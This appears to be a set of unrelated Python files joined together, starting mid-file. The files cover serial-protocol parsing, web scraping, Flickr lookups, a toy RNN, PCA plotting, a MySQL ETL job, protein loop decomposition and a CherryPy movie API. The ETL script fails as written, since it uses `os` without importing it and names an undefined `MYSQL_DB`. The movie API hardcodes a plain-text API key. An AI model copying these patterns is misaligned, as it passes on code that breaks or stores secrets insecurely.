if self._serial_bytes_available() >= len(self.MAGIC_HEADER) and \
self._check_for_start():
report, retval, payload = self._receive_packet()
if report >= 0:
self.queue.put((report, retval, payload))
if self.verbose:
self.log("Put report {} on queue".format(report))
def _check_for_start(self):
"""
Checks for the start of a reply from Pensel.
"""
while self._serial_bytes_available():
data = self._serial_read(1)
if len(data) == 1:
self._check_for_start_bytes.append(data[0])
try:
if self._check_for_start_bytes[-1] == self.MAGIC_NUM_3 and \
self._check_for_start_bytes[-2] == self.MAGIC_NUM_2 and \
self._check_for_start_bytes[-3] == self.MAGIC_NUM_1 and \
self._check_for_start_bytes[-4] == self.MAGIC_NUM_0:
if self.verbose:
self.log("Start Detected!")
return True
except IndexError:
pass
else:
break
# default, no start :(
if self.verbose:
self.log("Failed to detect start...")
return False
def _receive_packet(self):
"""
Receives a packet, whether from a report reply or an input report,
from Pensel. Doesn't check for start of packet. That's `check_for_start`
"""
report = self._serial_read(1)
if len(report) != 1:
self.log("ERROR: Didn't read back a report!")
report = -1
else:
report = report[0]
retval = self._serial_read(1)
if len(retval) != 1:
self.log("ERROR: Didn't read back a return value!")
retval = -1
else:
retval = retval[0]
return_payload_len = self._serial_read(1)
if len(return_payload_len) != 1:
self.log("ERROR: Didn't read back a return payload length!")
return_payload_len = 0
else:
return_payload_len = return_payload_len[0]
if return_payload_len != 0:
return_payload = self._serial_read(return_payload_len)
else:
return_payload = []
checksum = self._serial_read(1)
if len(checksum) != 1:
self.log("ERROR: Didn't read back a checksum!")
checksum = -1
else:
checksum = checksum[0]
data = self.MAGIC_HEADER + [report, retval, return_payload_len] + return_payload
data.append(checksum)
our_checksum = self.generate_checksum(data[:-1])
if our_checksum != checksum:
self.log("ERROR: Our checksum didn't calculate properly! "
"(Calculated {}, expected {})".format(our_checksum, checksum))
return -1, checksum, []
else:
if self.verbose:
self.log("Checksum match! ({} == {})".format(our_checksum, checksum))
return report, retval, return_payload
class PenselPlayback(BasePensel):
def __init__(self, playback_file, *args, **kwargs):
super().__init__(*args, **kwargs)
self.playback_file = playback_file
self._start_listener()
def send_report(self, report_ID, payload=None):
raise RuntimeError("Cannot send a report to a playback file!")
def close(self, exc_type=None, exc_val=None, exc_tb=None):
self.thread_run.clear()
def _start_listener(self):
self.thread_run = Event()
self.thread_run.set()
self.queue = Queue()
self.thread = threading.Thread(target=self._listener) # , args=(self,)
self.thread.start() # start it off
def _listener(self):
""" The threaded listener that looks for packets from Pensel. """
with open(self.playback_file, "rb") as f:
while self.thread_run.is_set():
length = f.read(1)
if len(length) == 0:
# out of data
break
length = length[0]
data = f.read(length)
if len(data) != length:
raise RuntimeError("Didn't receive the expected amount of bytes!")
# itterating over bytes gives us ints
report = data[0]
retval = data[1]
payload = [d for d in data[2:]]
if report >= 0:
self.queue.put((report, retval, payload))
if self.verbose:
self.log("Put report {} on queue".format(report))
if self.verbose:
self.log("Waiting for queue to empty...")
while self.packets_available():
time.sleep(0.01)
# ----- Helpful standalone methods
def find_ports():
ports = []
dev_dir = os.listdir("/dev/")
for thing in dev_dir:
if "cu." in thing:
ports.append(thing)
return ports
def choose_port(list_of_ports):
print("\nPorts:")
for ind, port in enumerate(list_of_ports):
print("\t{}: {}".format(ind, port))
while True:
try:
choice = int(input("Which port do you choose? "))
except Exception:
print("Invalid choice.")
continue
if choice < len(list_of_ports):
return list_of_ports[choice]
else:
print("Invalid index.")
def run_command(cmd, print_output=True):
"""
Kicks off a subprocess to run and accumilate the stdout of the process.
"""
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line.decode("utf-8"))
out.close()
print(" -> {}".format(cmd))
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
q_stdout = Queue()
q_stderr = Queue()
t_stdout = Thread(target=enqueue_output, args=(proc.stdout, q_stdout))
t_stderr = Thread(target=enqueue_output, args=(proc.stderr, q_stderr))
t_stderr.daemon = True # thread dies with the program
t_stdout.daemon = True
t_stdout.start()
t_stderr.start()
stdout = ""
stderr = ""
# read stdout and stderr without blocking
finished = False
while True:
done = proc.poll()
try:
line_stdout = ""
while True:
line_stdout += q_stdout.get(timeout=0.01)
except Empty:
pass
# accumilate stdout and print if we should
stdout += line_stdout
if print_output and line_stdout != "":
sys.stdout.write(bcolors.COLOR_CYAN)
for line in line_stdout.splitlines():
sys.stdout.write("\t{}\n".format(line))
sys.stdout.write(bcolors.COLOR_NC)
sys.stdout.flush()
try:
line_stderr = ""
while True:
line_stderr += q_stderr.get(timeout=0.01)
except Empty:
pass
# accumilate stderr and print if we should
stderr += line_stderr
if print_output and line_stderr != "":
sys.stderr.write(bcolors.COLOR_RED)
for line in line_stderr.splitlines():
sys.stderr.write("\t{}\n".format(line))
sys.stderr.write(bcolors.COLOR_NC)
sys.stderr.flush()
# check if we're done and the finished flag is set
if finished:
if done != 0 and print_output is False:
sys.stderr.write(bcolors.COLOR_RED)
for line in stderr.splitlines():
sys.stderr.write("\t{}\n".format(line))
sys.stderr.write(bcolors.COLOR_NC)
sys.stderr.flush()
return stdout, stderr, done
# check if the process is done...
if done is not None:
finished = True
# give the process's stdout and stderr time to flush
time.sleep(0.25)
|
from pprint import pprint
from bs4 import BeautifulSoup
import requests
import json
from Task4 import *
top_movies = scrape_top_list()
def get_movie_list_details(movie_list):
listOfUrl=[]
scrapMoviesList10=[]
i=0
while i<len(movie_list):
listOfUrl.append(movie_list[i]['url'])
scrap_data=scrape_movie_details(listOfUrl[i])
scrapMoviesList10.append(scrap_data)
i=i+1
return scrapMoviesList10
get_movie_list_details(top_movies[:178])
|
"""
VERSION
- Python 3
FUNCTION
- Write image urls to files
"""
import os
import pandas as pd
import requests
import multiprocessing
from optparse import OptionParser
import pickle as pkl
op = OptionParser()
op.add_option('--clss', action='store', type=str,
help='The image class (e.g., vietnam war).')
(opts, args) = op.parse_args()
PATH_HOME = os.path.expanduser('~') + '/Projects/iow/'
PATH_DATA = PATH_HOME + 'data/IR/flickr/ids_image/'
NAME_DATA_FILE = 'ids_' + opts.clss + '.pkl'
PATH_OUT = PATH_HOME + 'data/IR/flickr/urls_image/' + opts.clss + '/'
KEY_API = ''
N_THREADS = 16
SIZE_IMAGE = 7
if not os.path.exists(PATH_OUT):
os.makedirs(PATH_OUT)
# ___________________________________________________________________________
def retrieve_image(lock, ns, id_image):
try:
lock.acquire()
ns.counter_total += 1
lock.release()
if os.path.exists(PATH_OUT + '/' + id_image + '.txt'):
print('Exit: The file already exists: %s' % (id_image))
return
'''
- Sending the image info request;
- Extracting the image url.
'''
url_image_info = 'https://api.flickr.com/services/rest/' \
'?method=flickr.photos.getSizes' \
'&format=json&nojsoncallback=?' \
'&api_key=%s&photo_id=%s' \
% (KEY_API, id_image)
response = requests.get(url_image_info)
json_response = response.json()
url_image = json_response['sizes']['size'][SIZE_IMAGE]['source']
'''
Writing the image url.
'''
info_image = {}
info_image['url'] = url_image
info_image['name'] = id_image + '.jpg'
name_image_file = id_image + '.pkl'
print('Writing: %s' % name_image_file)
pkl.dump(info_image, open(PATH_OUT + name_image_file, 'wb'))
lock.acquire()
ns.counter += 1
lock.release()
except Exception as e:
print(e)
return
# ___________________________________________________________________________
def main():
dict_ids = pd.read_pickle(PATH_DATA + NAME_DATA_FILE)
ids_image = dict_ids['data'].keys()
'''
Enabling multiprocessing.
'''
manager = multiprocessing.Manager()
ns = manager.Namespace()
ns.counter = 0
ns.counter_total = 0
lock = manager.Lock()
processes = multiprocessing.Pool(N_THREADS)
from functools import partial
func = partial(retrieve_image, lock, ns)
processes.map(func, ids_image)
print('The retrieval is finished (%d/%d).'
% (ns.counter, ns.counter_total))
if __name__ == '__main__':
main()
|
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
def widthOfBinaryTree(root):
queue = [(root, 0, 0)]
cur_depth = left = ans = 0
for node, depth, pos in queue:
if node:
queue.append((node.left, depth+1, pos*2))
queue.append((node.right, depth+1, pos*2 + 1))
if cur_depth != depth:
cur_depth = depth
left = pos
ans = max(pos - left + 1, ans)
return ans
root = TreeNode(1)
root.left = TreeNode(3)
root.right = TreeNode(2)
root.left.left = TreeNode(5)
root.left.right = TreeNode(3)
root.right.right = TreeNode(9)
widthOfBinaryTree(root)
|
import copy
import numpy as np
np.random.seed(1)
def sigmoid(x):
output = 1/(1 + np.exp(-x))
return output
def sigmoid_derivative(x):
derivative = x*(1-x)
return derivative
#dataset generation
int2binary = {}
binary_dim = 8
largest_number = pow(2,binary_dim)
binary = np.unpackbits(np.array([range(largest_number)],dtype=np.uint8).T,axis=1)
for i in range(largest_number):
int2binary[i] = binary[i]
#input variables
alpha = 0.1
input_dim = 2
hidden_dim = 16
output_dim = 1
#initialize weights between (-1,1)
w0 = 2*np.random.random((input_dim,hidden_dim)) - 1
w1 = 2*np.random.random((hidden_dim,output_dim)) - 1
w2 = 2*np.random.random((hidden_dim,hidden_dim)) - 1
dw0 = np.zeros_like(w0)
dw1 = np.zeros_like(w1)
dw2 = np.zeros_like(w2)
#training
for j in range(10000):
#generate a simple addition a + b = c
a_int = np.random.randint(largest_number/2)
a = int2binary[a_int]
b_int = np.random.randint(largest_number/2)
b = int2binary[b_int]
#true value
c_int = a_int+b_int
c = int2binary[c_int]
#store the guess
d = np.zeros_like(c)
error = 0
layer_2_deltas = list()
layer_1_values = list()
layer_1_values.append(np.zeros(hidden_dim))
#moving along the binary coding
for p in range(binary_dim):
#generate input and output
X = np.array([[a[binary_dim - p -1] ,b[binary_dim - p -1]]])
y = np.array([[c[binary_dim - p -1]]]).T
#hidden layer = input + prev_hidden
layer_1 = sigmoid(np.dot(X,w0) + np.dot(layer_1_values[-1],w2))
#output layer
layer_2 = sigmoid(np.dot(layer_1, w1))
#backprop
layer_2_error = y - layer_2
layer_2_deltas.append((layer_2_error)*sigmoid_derivative(layer_2))
error += np.abs(layer_2_error[0])
#estimate value
d[binary_dim - p - 1] = np.round(layer_2[0][0])
#store hidden layer to use it in the next time step
layer_1_values.append(copy.deepcopy(layer_1))
future_layer_1_delta = np.zeros(hidden_dim)
for p in range(binary_dim):
X = np.array([[a[p],b[p]]])
layer_1 = layer_1_values[-p-1]
prev_layer_1 = layer_1_values[-p-2]
#error at output layer
layer_2_delta = layer_2_deltas[-p-1]
#error at hidden layer
layer_1_delta = (future_layer_1_delta.dot(w2.T) + layer_2_delta.dot(w1.T)) * sigmoid_derivative(layer_1)
#weight update
dw1 += np.atleast_2d(layer_1).T.dot(layer_2_delta)
dw2 += np.atleast_2d(prev_layer_1).T.dot(layer_1_delta)
dw0 += X.T.dot(layer_1_delta)
future_layer_1_delta = layer_1_delta
w0 += dw0 * alpha
w1 += dw1 * alpha
w2 += dw2 * alpha
dw0 *=0
dw1 *=0
dw2 *=0
#print progress
if(j%1000 ==0):
print("Error : " + str(error))
print("Prediction : "+ str(d))
print("True Value : " + str(c))
out = 0
for index,x in enumerate(reversed(d)):
out += x*pow(2,index)
print(str(a_int)+ " + " + str(b_int)+ " = " + str(out))
print("--------")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os.path
import glob
import numpy as np
from scipy.special import erfinv
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from matplotlib.patches import Ellipse
from collections import OrderedDict
input_file, title, scale_of_the_scales = ('dataset_procrustes.txt', 'PCA - Positions', .06)
#input_file, title, scale_of_the_scales = ('distances.txt', 'PCA - Distances', .06)
#input_file, title, scale_of_the_scales = ('angles.txt', 'PCA - Angles', 3.)
#input_file, title, scale_of_the_scales = ('all_data.txt', 'PCA - Positions, Angles and Distances', 0.06)
plot_type = 'scales' # '2d', '3d' or 'scales'
annotation = True
colors = ['#ffdb1d', '#629ea0', '#601047']
legend_labels = ['unilobate', 'trilobate', 'pentalobate']
points_file = 'dataset_procrustes.txt'
aspect_ratio = 1.
def parse_data_file(filename):
X = []
y = []
S = []
with open(filename, 'r') as fd_in:
for i, line in enumerate(fd_in):
if i > 0:
# Parse the values
values = line.split(',')
species = values[0]
values = values[1:]
points = list(map(float, map(str.strip, values)))
X.append(points)
label = int(species[-1])
S.append(species[:-1])
y.append(label)
return S, np.array(X), np.array(y)
S, X, y = parse_data_file(input_file)
def getConfidenceEllipse(X, color, p=0.9):
x, y = (X[:,0], X[:,1])
cov = np.cov(x, y)
lambda_, v = np.linalg.eig(cov)
lambda_ = np.sqrt(lambda_)
z = np.sqrt(2)*erfinv(p)
ell = Ellipse(xy=(np.mean(x), np.mean(y)),
width=lambda_[0]*z*2, height=lambda_[1]*z*2,
angle=np.rad2deg(np.arccos(v[0, 0])))
ell.set_facecolor('none')
ell.set_edgecolor(color)
return ell
print(X.shape)
labels, y = np.unique(y, return_inverse=True)
pca = PCA()
Xpca = pca.fit_transform(X)
print('=================================================')
print(' PC Eigenvalues % of total var ')
print('-------------------------------------------------')
for i, (eigv, r) in enumerate(zip(pca.explained_variance_, pca.explained_variance_ratio_)):
print(' {: >2d} {: >8.3f} {: >5.2f}'.format(i+1, eigv, 100*r))
print('=================================================')
plt.rcParams['svg.fonttype'] = 'none'
if plot_type == '3d':
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for i in range(len(labels)):
mask = (y == i)
ell = getConfidenceEllipse(Xpca[mask])
ax.scatter(Xpca[mask,0], Xpca[mask,1], Xpca[mask,2], color=colors[i])
if annotation:
for i, x in enumerate(Xpca):
ax.annotate(S[i], x[:2], size='x-small', xytext=(6,2), textcoords='offset pixels')
ax.legend(legend_labels)
plt.title(title)
plt.show()
elif plot_type == '2d':
fig = plt.figure()
ax = fig.add_subplot(111)
for i in range(len(labels)):
mask = (y == i)
ell = getConfidenceEllipse(Xpca[mask], color=colors[i])
ax.add_artist(ell)
plt.scatter(Xpca[mask,0], Xpca[mask,1], color=colors[i])
if annotation:
for i, x in enumerate(Xpca):
plt.annotate(S[i], x[:2], size='x-small', xytext=(6,2), textcoords='offset pixels')
plt.legend(legend_labels)
plt.title(title)
plt.show()
elif plot_type == 'scales':
fig = plt.figure()
ax = fig.add_subplot(111)
_, points, _ = parse_data_file(points_file)
for i in range(len(labels)):
mask = (y == i)
ell = getConfidenceEllipse(Xpca[mask], color=colors[i])
ax.add_artist(ell)
for i in range(len(Xpca)):
polygon = points[i].reshape(-1, 2)
polygon[:,1] = -polygon[:,1]
polygon[:,0] = aspect_ratio * polygon[:,0]
polygon = polygon * scale_of_the_scales + Xpca[i,:2]
plt.fill(polygon[:,0], polygon[:,1], color=colors[y[i]], label=legend_labels[y[i]])
if annotation:
for i, x in enumerate(Xpca):
plt.annotate(S[i], x[:2], size='xx-small', xytext=(6,2), textcoords='offset pixels')
handles, labels = plt.gca().get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
plt.legend(by_label.values(), by_label.keys())
plt.xlabel('Principal Component 1')
plt.ylabel('Principal Component 2')
plt.title(title)
plt.gca().set_aspect(aspect_ratio)
plt.show()
else:
print('Error: "plot_type" must be either \'2d\', \'3d\' or \'scales\'')
|
import pandas as pd
from sqlalchemy import create_engine
MYSQL_USER = os.environ["MYSQL_USER"]
MYSQL_PASSWORD = os.environ["MYSQL_PASSWORD"]
MYSQL_HOST = os.environ["MYSQL_HOST"]
MYSQL_DATABASE = os.environ["MYSQL_DATABASE"]
mysql_engine = create_engine(f'mysql+pymysql://{MYSQL_USER}:{MYSQL_PASSWORD}@{MYSQL_HOST}/{MYSQL_DB}?charset=utf8', pool_recycle=3600, encoding='utf-8')
mysql_connection = mysql_engine.connect()
##############################################
# Cash-ins
##############################################
def run_cashins_etl():
cashins_query = """
SELECT `ID`, `User ID`, `Created At`, `Amount Src`, `Amount Dst`
FROM central_financial
WHERE `Asset Src` = 'COP' AND `Asset Dst` = 'USDv' AND State = 'COMPLETED' AND Type = 'NORMAL'
"""
cashins = pd.read_sql(cashins_query, mysql_connection)
cashins.to_sql("cashins", mysql_connection, if_exists='replace', index=False)
##############################################
# Cash-outs
##############################################
def run_cashouts_etl():
cashouts_query = """
SELECT `ID`, `User ID`, `Created At`, `Amount Src`, `Amount Dst`
FROM central_financial
WHERE `Asset Src` = 'USDv' AND `Asset Dst` = 'VES' AND State = 'COMPLETED' AND Type = 'NORMAL'
"""
cashouts = pd.read_sql(cashouts_query, mysql_connection)
cashouts.to_sql("cashouts", mysql_connection, if_exists='replace', index=False)
if __name__ == "__main__":
run_cashins_etl()
run_cashouts_etl() |
# 2014.10.18 14:41:34 Central European Daylight Time
#Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/profile/ProfileAchievementSection.py
from gui.shared import g_itemsCache
from gui.Scaleform.daapi.view.lobby.profile.ProfileSection import ProfileSection
from gui.Scaleform.daapi.view.meta.ProfileAchievementSectionMeta import ProfileAchievementSectionMeta
from gui.shared.utils.RareAchievementsCache import g_rareAchievesCache, IMAGE_TYPE
class ProfileAchievementSection(ProfileSection, ProfileAchievementSectionMeta):
def __init__(self, *args):
ProfileAchievementSectionMeta.__init__(self)
ProfileSection.__init__(self, *args)
g_rareAchievesCache.onTextReceived += self._onRareTextReceived
g_rareAchievesCache.onImageReceived += self._onRareImageReceived
def request(self, data):
dossier = g_itemsCache.items.getAccountDossier(data)
if dossier is not None:
g_rareAchievesCache.request(dossier.getBlock('rareAchievements'))
def _onRareTextReceived(self, *args):
self.invokeUpdate()
def _onRareImageReceived(self, imgType, rareID, imageData):
if imgType == IMAGE_TYPE.IT_67X71:
self.invokeUpdate()
def _disposeRequester(self):
g_rareAchievesCache.onImageReceived -= self._onRareImageReceived
g_rareAchievesCache.onTextReceived -= self._onRareTextReceived
+++ okay decompyling res/scripts/client/gui/scaleform/daapi/view/lobby/profile/profileachievementsection.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.10.18 14:41:34 Central European Daylight Time
|
from selenium.webdriver.remote.webdriver import WebDriver
from homework_zfh.test_frame.handle_black import handle_black
class BasePage:
def __init__(self, driver: WebDriver = None):
self.driver = driver
@handle_black
def find(self, locator):
return self.driver.find_element(*locator)
def find_and_click(self, locator):
self.find(locator).click()
def send(self, locator, content):
self.find(locator).send_keys(content)
|
#####################################################################################################################################################################
#
# Grzegorz M Koczyk (2007-)
#
# Decomposition of protein structures into loops
#
#####################################################################################################################################################################
from __future__ import with_statement
import sys, os, os.path
from dhcl.utils import *
from dhcl.pdb_data import *
from collections import defaultdict
DEBUG = 0
######################################################################################################################################################################
# FUNCTIONS - parsing data
@handlify(is_method=False, mode='r')
def readAtomDistsForResidues(fh, triple2seqno):
''' Utility function to read in residue contact distances data outputted by contacts program '''
result = defaultdict( innerDefaultdict( innerDefaultdict( dict ) ) )
for line in fh:
if line:
atomno1, resno1, icode1, resname1, chain1, atomname1, atomno2, resno2, icode2, resname2, chain2, atomname2, r = line.strip('\n').split('\t')
resno1, resno2 = int(resno1), int(resno2)
seqno1, seqno2 = triple2seqno[chain1][(resno1, icode1)], triple2seqno[chain2][(resno2, icode2)]
r = float(r)
r1 = result[chain1][seqno1][chain2]
r2 = result[chain2][seqno2][chain1]
if resno2 in r1:
r1[resno2].no_contacts +=1
r_old = r1[resno2].r
r1[resno2].r = min( [r, r_old] )
else:
result[chain2][seqno2][chain1][seqno1] = result[chain1][seqno1][chain2][seqno2] = StructObject( resname1=resname1, resname2=resname2, r=r, no_contacts=1 )
return result
MIN_LOOP_LEN = 15
MAX_LOOP_LEN = 45
MIN_INIT_DISTANCE = 2.5
MAX_INIT_DISTANCE = 5.0
DISTANCE_STEP = 1.0
MAX_FINAL_DISTANCE = 12.0
# Max gap length for stopping criterion
MAX_GAP_LEN = 10
class Loop(object):
''' Object representing a loop '''
def __init__(self,resno1, resno2, distance, chain=' ', bounds=None):
self.resno1, self.resno2 = (resno1,resno2) if resno2>resno1 else (resno2,resno1)
if bounds is not None:
self.bc = bounds[chain]
else:
self.bc = None
self.distance = distance
self.chain = chain
self.use = True
# Alternative accessors for first and last residue numbers
def getBegin(self):
return self.resno1
begin = property(getBegin)
def getEnd(self):
return self.resno2
end = property(getEnd)
def encompasses(self, other):
''' Whether a loop encompasses another loop '''
if self.chain!=other.chain:
return False
else:
return (self.resno1<=other.resno1 and self.resno2>=other.resno2)
def crosses(self, other):
''' Whether a loop overlaps with another loop '''
if self.chain!=other.chain:
return 0
else:
d = min([self.resno2, other.resno2]) - max([self.resno1, other.resno1])+1
if d>0:
return d
else:
return 0
def __str__(self):
if self.bc:
beginr, begini = self.bc[self.begin]
begin = "%s%s" % (beginr, begini.strip())
endr, endi = self.bc[self.end]
end = "%s%s" % (endr, endi.strip())
# Otherwise use our numbering
else:
begin = self.begin
end = self.end
return "(%s:%s>%s:%s=%s)" % (begin, self.chain, end, self.chain, self.distance)
def __len__(self):
return self.resno2-self.resno1+1
def getSize(self):
return self.resno2-self.resno1+1
size = property(getSize)
@classmethod
def parseString(klass, s, seqno2triple=None, triple2seqno=None):
''' Parse a string encoding this loop (see __str__ method for the input pattern)'''
s = s.replace(' ', '')
if len(s):
loop_strs = s.split('/')
for lstr in loop_strs:
lstr = lstr[1:-1]
bstr, tstr = lstr.split('=')
distance = float(tstr)
b1str, b2str = bstr.split('>')
begin, chain = b1str.split(':')
end, chain = b2str.split(':')
chain = chain if chain else ' '
if triple2seqno:
begin, end = triple2seqno[chain][parseResidueId(begin)], triple2seqno[chain][parseResidueId(end)]
else:
pass
yield klass(begin, end, distance, chain, seqno2triple)
__repr__ = __str__
def decomposeStep(rdists, seqno2triple, r_min, r_max, no_len_bounds=False):
''' Decompose into loops at given (r_min, r_max) radius thresholds. '''
for chain in seqno2triple:
bchain = sorted(seqno2triple[chain])
for i, resno1 in enumerate(bchain):
r_ = rdists[chain][resno1][chain]
for resno2 in bchain[i+1:]:
if resno2 in r_ and (no_len_bounds or MIN_LOOP_LEN <= (resno2-resno1+1) and (resno2-resno1+1) <= MAX_LOOP_LEN):
r_dist = r_[resno2].r
if resno2 in r_ and (r_min <= r_dist) and ( r_dist <= r_max):
yield Loop(resno1, resno2, r_dist, chain, seqno2triple)
def curateSingle(loops):
''' Curate a single set of loops, so that only the non-overlapping tightest ones remain. '''
loops = sorted(loops, key=lambda l: l.distance)
keep = [True for l in loops]
for i,loop in enumerate(loops):
if not keep[i]:
continue
for j,loop_ in enumerate(loops[i+1:]):
if loop.crosses(loop_)>5:
keep[i+j+1] = False
return [ l for i,l in enumerate(loops) if keep[i] ]
def curateByOld(loops, old_loops):
''' Curate a single set of loops, by other set of loops (removing overlapping segments). '''
for loop in old_loops:
yield loop
for loop in loops:
keep = True
for loop_ in old_loops:
if loop.crosses(loop_)>5:
keep=False
break
if keep:
yield loop
class Block(list):
pass
def loopDecompose(rdists, seqno2triple):
# Start with MIN_INIT_DISTANCE, MAX_FINAL_DISTANCE decomposition
# Find the loops and reconstruct initial coverage
whole_loops = list( decomposeStep(rdists, seqno2triple, MIN_INIT_DISTANCE, MAX_FINAL_DISTANCE) )
if DEBUG:
print "Whole", whole_loops
loops = list( curateSingle(whole_loops) )
if DEBUG:
print loops
# Partition loops by chain
lbcs = defaultdict(list)
for chain in seqno2triple:
lbcs[chain] = list()
for l in loops:
lbcs[l.chain].append(l)
# Also create smaller loops and partition them by chain
smcs = defaultdict(list)
for l in decomposeStep(rdists, seqno2triple, 4., 5.):
if len(l)<30:
smcs[l.chain].append(l)
# For each chain
for chain in lbcs:
cloops = lbcs[chain] = sorted(lbcs[chain], key=lambda l: l.resno1)
smaller_loops = sorted(smcs[chain], key=lambda l: l.distance)
#####################################################################
# Find blocks of large loops (>40AA)
blocks = []
block = Block()
block.begin = block.end = min(seqno2triple[chain])
new_cloops = []
for l in cloops:
if len(l)>=39:
if block.begin > l.resno1:
block.begin = l.resno1
if block.end < l.resno2:
block.end = l.resno2
block.append(l)
else:
if block:
if block.end < l.resno1:
block.end = l.resno1
blocks.append(block)
block = Block()
block.begin = l.resno2
block.end = l.resno2
# This loop is saved for future (it is not part of a block to decompose)
new_cloops.append(l)
if block:
block.end = max(seqno2triple[chain])
blocks.append(block)
if DEBUG:
print blocks
print smaller_loops
########################################################################
# For each block of large loops - try to decompose it into sets of smaller ones
for block in blocks:
nsloops = list( curateSingle( l for l in smaller_loops if l.resno1>=block.begin and l.resno2<=block.end ) )
if DEBUG:
print "Decompose"
print block, block.begin, block.end
print nsloops
old_but_used = []
if len(nsloops)>0:
for l in block:
append = True
for nl in nsloops:
if nl.crosses(l)>5:
append=False
break
# Keep old loops if they are the only solution (no significant crosses between new ones and old one) :)
if append:
old_but_used.append(l)
for l in nsloops:
l.use = False
new_cloops.extend(nsloops+old_but_used)
else:
new_cloops.extend(block)
if DEBUG:
print new_cloops
########################################################################
# Curate ends
#lbcs[chain] = new_cloops
cloops = sorted(new_cloops, key=lambda l: l.resno1)
if len(cloops)>1:
# Curate N end - try to extend the original loop keeping to within 115% of tightness
loop = cloops[0]
if loop.use and len(loop)<20:
begin = min(seqno2triple[chain])
if len(cloops)>1:
if cloops[1].resno1 > loop.resno2:
end = cloops[1].resno1
else:
end = loop.resno2
else:
end = max(seqno2triple[chain])
cands = sorted( [ l for l in whole_loops if l.resno1>=begin and l.resno2<=end and l.distance<=loop.distance*1.15 and l.chain==chain],
key=lambda l: len(l), reverse=True )
cloops[0] = cands[0]
# Curate C end - try to extend the original loop keeping to within 115% of tightness
loop = cloops[-1]
if loop.use and len(loop)<20:
end = max(seqno2triple[chain])
if len(cloops)>1:
if cloops[-2].resno2 < loop.resno1:
begin = cloops[-2].resno2
else:
begin = loop.resno1
else:
begin = min(seqno2triple[chain])
cands = sorted( [ l for l in whole_loops if l.resno1>=begin and l.resno2<=end and l.distance<=loop.distance*1.15 and l.chain==chain],
key=lambda l: len(l), reverse=True )
cloops[-1] = cands[0]
lbcs[chain] = cloops
############################################################################
# Results are returned by chain
return lbcs
def prepareLoops(calpha_cs_fname, bounds_fname):
''' Prepares domains for chains on basis of the files. WARNING: returns Python data structure, not filename '''
seqno2triple, triple2seqno = readChainBounds(bounds_fname)
return loopDecompose( readAtomDistsForResidues(calpha_cs_fname, triple2seqno), seqno2triple )
# INPUT / OUTPUT OF LOOPS
import csv
@handlify(mode='w')
def writeLoopsTsv(fh, loops, uid=None):
''' Write loops into TSV format. Optionally give the unique PDB identifier (first column in the TSV file).'''
writer = csv.writer(fh, dialect='excel-tab')
for chain in sorted(loops):
writer.writerow([uid, chain] +
['/'.join( [ str(l) for l in loops[chain] ] ) ]
)
@handlify(mode='r')
def readLoopsTsv(fh, seqno2triple=None, triple2seqno=None):
''' Read loops in tab-separated format into a dictionary indexed by PDB of loop dictionaries indexed by chains.'''
reader = csv.reader(fh, dialect='excel-tab')
r = defaultdict( dict )
for row in reader:
uid, chain = row[0], row[1]
r[uid][chain] = list(Loop.parseString(row[2], seqno2triple, triple2seqno))
return r
|
#John F. Lake, Jr.
#This is the handler for /movies/, /movies/{movieID}, /reset/, and /reset/{movieID}
import cherrypy
from _movie_database import _movie_database
import json
class Movies(object):
@cherrypy.tools.json_in()
#Load in all of the data.
def __init__(self,DB):
self.API_KEY = 'AAAAAAAB'
self.myDB = DB
self.myDB.delete_all_ratings()
self.myDB.load_movies('ml-1m/movies.dat')
self.myDB.load_users('ml-1m/users.dat')
self.myDB.load_ratings('ml-1m/ratings.dat')
self.myDB.load_posters('ml-1m/images.dat')
#GET for /movies/{movieID}; returns the info about that movie
def GET(self,id=None):
output = {'result':'success'}
mov = self.myDB.get_movie(id)
if mov is None:
output['result'] = 'error'
output['message'] = 'key not found'
else:
output['id'] = id
output['genres'] = mov[1]
output['title'] = mov[0]
output['img'] = self.myDB.get_poster_by_id(id)
return json.dumps(output,encoding = 'latin-1')
#PUT for /movies/{movieID}; changes that movie
def PUT(self,id=None):
output = {'result':'success'}
v = json.loads(cherrypy.request.body.read())
if v['apikey'] == self.API_KEY:
info = []
info.append(v['title'])
info.append(v['genres'])
self.myDB.set_movie(id,info)
else:
output['result'] = 'failure'
return json.dumps(output,encoding = 'latin-1')
#GET for /movies/; returns info about all of the movies
def GET_ALL(self):
output = {'result':'success'}
output['movies'] = []
for key in self.myDB.get_movies():
mov = self.myDB.get_movie(key)
if mov is not None:
info = {}
info['id'] = int(key)
info['genres'] = mov[1]
info['title'] = mov[0]
info['img'] = self.myDB.get_poster_by_id(key)
output['movies'].append(info)
return json.dumps(output,encoding = 'latin-1')
#POST for /movies/; adds a movie
def POST(self):
output = {'result':'success'}
v = json.loads(cherrypy.request.body.read())
if v['apikey'] == self.API_KEY:
info = []
info.append(v['title'])
info.append(v['genres'])
id = self.myDB.add_movie(info)
output['id'] = id
else:
output['result'] = 'failure'
return json.dumps(output,encoding = 'latin-1')
#DELETE for /movies/{movieID}; deletes that movie
def DELETE(self,id):
v = json.loads(cherrypy.request.body.fp.read())
output = {'result':'success'}
if v['apikey'] == self.API_KEY:
self.myDB.delete_movie(id)
else:
output['result'] = 'failure'
return json.dumps(output,encoding = 'latin-1')
#DELETE for /movies/; deletes all of the movies
def DELETE_ALL(self):
output = {'result':'success'}
v = json.loads(cherrypy.request.body.fp.read())
keys = self.myDB.get_movies()
if v['apikey'] == self.API_KEY:
for key in keys:
self.myDB.delete_movie(key)
else:
output['result'] = 'failure'
return json.dumps(output,encoding = 'latin-1')
#PUT for /reset/{movieID}; Resets that movie
def RESET(self,id):
v = json.loads(cherrypy.request.body.fp.read())
output = {'result':'success'}
if v['apikey'] == self.API_KEY:
self.myDB.load_movie(id,'ml-1m/movies.dat')
else:
output['result'] = 'failure'
return json.dumps(output,encoding = 'latin-1')
#PUT for /reset/; resets all of the data
def RESET_ALL(self):
v = json.loads(cherrypy.request.body.fp.read())
output = {'result':'success'}
if v['apikey'] == self.API_KEY:
self.myDB.__init__()
